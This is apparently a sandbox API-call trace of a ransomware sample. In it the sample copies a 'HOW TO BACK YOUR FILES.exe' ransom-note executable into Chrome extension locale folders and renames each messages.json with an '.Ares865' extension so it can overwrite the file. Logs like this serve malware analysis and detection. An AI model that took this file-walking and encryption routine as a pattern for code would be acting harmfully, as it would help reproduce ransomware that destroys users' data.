[0101.621] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.622] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.622] GetLastError () returned 0x0 [0101.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fec7e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e632200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e632200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.623] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.623] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.623] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.623] lstrlenW (lpString="messages.json") returned 13 [0101.623] lstrlenW (lpString="Ares865") returned 7 [0101.623] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.Ares865") returned 163 [0101.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.625] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210) returned 1 [0101.628] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN" [0101.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN" [0101.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.629] GetLastError () returned 0x0 [0101.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fec7e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e632200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e632200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.630] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.630] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.630] lstrlenW (lpString="messages.json") returned 13 [0101.630] lstrlenW (lpString="Ares865") returned 7 [0101.630] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.630] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.Ares865") returned 163 [0101.630] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.632] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=176) returned 1 [0101.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi" [0101.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi" [0101.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.636] GetLastError () returned 0x0 [0101.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.636] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fc6680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e658360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e658360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.636] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.636] lstrlenW (lpString="messages.json") returned 13 [0101.636] lstrlenW (lpString="Ares865") returned 7 [0101.636] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.637] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.Ares865") returned 160 [0101.637] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.638] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0101.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur" [0101.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur" [0101.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.642] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.642] GetLastError () returned 0x0 [0101.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.643] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fc6680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e658360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e658360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.643] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.643] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.643] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.643] lstrlenW (lpString="messages.json") returned 13 [0101.643] lstrlenW (lpString="Ares865") returned 7 [0101.643] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.643] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.Ares865") returned 160 [0101.643] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.645] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=375) returned 1 [0101.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk" [0101.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk" [0101.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.652] GetLastError () returned 0x0 [0101.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fc6680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e658360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e658360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.652] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.652] lstrlenW (lpString="messages.json") returned 13 [0101.652] lstrlenW (lpString="Ares865") returned 7 [0101.652] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.652] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.Ares865") returned 160 [0101.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.654] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=277) returned 1 [0101.657] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 